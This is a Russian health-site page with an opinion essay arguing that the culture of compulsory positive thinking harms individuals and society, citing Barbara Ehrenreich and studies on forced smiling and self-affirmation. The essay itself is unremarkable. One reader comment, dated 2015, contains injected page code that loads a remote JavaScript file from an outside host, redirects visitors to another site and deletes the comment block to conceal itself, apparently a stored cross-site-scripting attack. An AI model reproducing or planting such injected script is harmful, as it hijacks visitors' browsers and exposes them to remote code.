Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Без тени улыбки  >>  Без тени улыбки
 
Обратная связь
 

Без тени улыбки

Размер шрифта
24 июля 2011 13:22
  • google_analytics: false
  • Нравится

Позитивное мышление как орудие массового поражения и причина экономических катаклизмов – к такому выводу пришли в последнее время американские исследователи и психологи. Как получилось, что во всем виновато вечное желание быть счастливым?

Екатерина Олейникова / «Здоровье инфо»

«Если хочешь добиться успеха, забудь о неудачах». «Чтобы разбогатеть, надо думать о деньгах». «Мысль материальна». «Смерть – это то, что бывает с другими». На любом развале у входа на рынок или в киоске у метро таких мантр хоть пруд пруди. Хорошо, что в нашей стране позитив как отречение от всякой плохой мысли еще не принял характера мировой эпидемии, однако неизвестно, когда рванет эта мина замедленного действия.

Все началось в те незабываемые годы, когда на закате СССР открылись шлюзы, и в страну хлынула информация, столько лет сдерживаемая мощной дамбой советской цензуры. «Как завоевывать друзей и оказывать влияние на людей» - подобными книгами зачитывались тогда многие. Люди безоговорочно верили новой философии, напоминающей знакомое «Человек сам кузнец своего счастья», только с переложением на современный лад и готовы были отдать последние деньги, лишь бы выучить 30 шагов к успеху, раскрыть 20 секретов счастья в личной жизни и выяснить 5 главных тайн человеческого общения – и до ста считать не надо, чтобы мир лег к твоим ногам. На каждом углу открывались семинары личностного роста, тренинги успеха, курсы повышения самооценки

Организаторы подобных сборищ зарабатывали деньги с такой же легкостью, с какой рассказывали о рецептах счастья.  Одна из посетительниц вспоминает: «На курсах, куда я пришла за ответами, было очень много симпатичных упражнений. Меня хвалили, поднимали на двух мизинцах вверх «одной только силой веры», моим рассказам аплодировали сто человек. Однако где-то посреди той эйфории внимания и комплиментов я вдруг ухватила за хвост одну спасительную мысль: «Все эти люди хором кричат мне: «Ты прямая», хотя на самом деле я крива».

Любая сильная эмоция, положительная или отрицательная, ищет выхода наружу. Слезы надо излить, счастье нужно выкрикнуть, иначе будет одинаково больно. Вот почему потенциал эмоции измеряется не столько тем, что выплеснуто, сколько тем, что осталось. В случае со счастьем, как правило, внутри не остается ничего. Негатив же, как и любой кризис, в разы продуктивней. Наверное, если задуматься, счастья нам отмеряется в граммах на аптекарских весах, потому что это всего лишь пара минут штиля, передышки. Счастье не может быть вечным, так как оно противоречит идее движения, а значит, и идее жизни: любой человек, не двигаясь, всегда падает вниз.

Тем не менее именно счастье, наряду с молодостью и красотой, продается лучше всего, и те, кто этими приметами не обладает, того – за борт, в сад, в изгои. Формула «Young, hot and sexy» возведена в абсолют и доведена до абсурда: и мы имеем возможность лицезреть молодящихся сорокалетних тетушек с хвостиками и играющих в компьютерные игры почтенных отцов семейства.

Рассматривая феномен поддельного счастья как рецепта успеха, писательница, феминистка Барбара Эринрайх пишет историю всепоглощающего оптимизма, не имеющего ничего общего с подлинными чувствами человека. Все началось с того, что ей поставили страшный диагноз: рак молочной железы. Стремясь поделиться с людьми своим горем, она окунулась с головой в «культуру розовой ленточки». Однако ее не просто не стали слушать: на форуме ей быстро объяснили, что если она будет заливаться слезами, то только усугубит течение болезни и сократит шансы на выживание. Болезнь – дар, ему надо радоваться. Во-первых, вылечишься, во-вторых станешь в итоге благодарным, позитивным и любящим созданием.

Однако именно любви, понимания и внимания к себе Эринрайх не получила. Тогда она решила исследовать сам феномен позитивного мышления и его истоки. Выяснилось, движение берет свое начало из учения Мэри Бейкер-Эдди, американской писательницы и «пророчицы», которая настаивала на том, что человек может исцелить себя сам правильным направлением мысли. «Наука исцеления – это правда. Если человек лжив, то его душевное состояние противостоит целительным силам, и то же самое можно сказать о гордыне, зависти, похоти и плотских пороках», - писала Мэри Бейкер-Эдди в книге «Наука о здоровье».

По наблюдению Эринрайх такую женщину, как Бейкер-Эдди, требовала сама история: к середине 19 века кальвинизм – религия страха и обреченности – постепенно вырождался. Необходимы были новые идеалы. Но позитивное мышление, явившись альтернативой кальвинизму, унаследовало от него все гадкие особенности: это и жесткое осуждение, берущее истоки в религиозном презрении греха, и настойчивое, болезненное самоуглубление, и, по-прежнему, никакого подлинного гедонизма, никакой спонтанности чувств.

Для человека, мыслящего позитивно, любая эмоция подлежит препарированию, свою внутреннюю жизнь ему надо постоянно анатомировать, чтобы не оставалось ни намека на негатив. Рефлексия как метод работы над собой была изуродована до орудия уничтожения любого сомнения в собственном счастье. Человек отрекся от сочувствия окружающих, сделав ставку на эгоцентризм. Именно там, в конце 19 века начался уход от общинности, от стремления одного быть в социуме и от умения всех сочувствовать друг другу.

Сегодня позитивное мышление определяет развитие целого общества, став его идеологией. Оно вросло корнями в его сферы, превратившись в религию верующих, политиков и бизнесменов. Мало того, прямых доказательств теории, что болезнь можно убить в себе силой мысли, и в помине нет. Оставаясь наедине с проблемой и ставя перед собой задачу избавиться от нее, человек отказывается от критического взгляда, лишается возможности оценить себя со стороны. Общество становится номинальным собранием разрозненных индивидуальностей. Зачем проявлять социальную активность, если обществу не нужны никакие проблемы, а значит, не нужен и я? И кого мне благодарить, как не самого себя за все то, что происходит в моей жизни? Только позитивное мышление, считает Эринрайх, виновно в том, что человек стремится к самоизоляции, лишается сил, и весь остальной мир ему неинтересен. Именно в позитивном мышлении Эринрайх видит причину кризиса рынка недвижимости в Америке, положившего начало мировому коллапсу 2008-го. Ярче картины, действительно, не представить. Апогей позитивного мышления: вся страна живет в долг и отказывается, во-первых, думать о плохом, во-вторых, вслух рассуждать об этом.  

Не только Эринрайх задается подобными вопросами. Американские нейропсихологи Ричард Дэвидсон, Пол Экман и Уоллес Фризен недавно установили, что деланная улыбка активирует области мозга, ответственные за отрицательные чувства. Канадский ученый Джоанна Вуд с коллегами провела эксперимент, по итогам которого заключила, что после сеансов самовосхваления люди с низкой самооценкой впадали в еще более мрачное настроение. Попытки подавить в себе негатив только все портят. Человеченость, придавленная цинизмом, стремится наружу, и, не имея выхода, причиняет еще больше страданий.

Остается заключить только одно: сам себя не обманешь, а, уходя глубоко на дно, растеряешь всех друзей, коллег и сочувствующих. Впрочем, другого выхода у человека не будет до тех пор, пока он сам продолжает с таким положением дел мириться, не осознавая, что там, где болен один, не имея шансов на выздоровление, заболеет и все общество, в котором каждый сам себе не брат.  

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:09

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Слайдшоу

Как улыбнуться, чтобы наладить свою жизнь? Почему вам не нравится ваша улыбка на фото?
Что оставит вас с беззубой улыбкой? Улыбнитесь! Или как наесться до белых зубов
Секреты белозубой улыбки Самые улыбчивые профессии
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.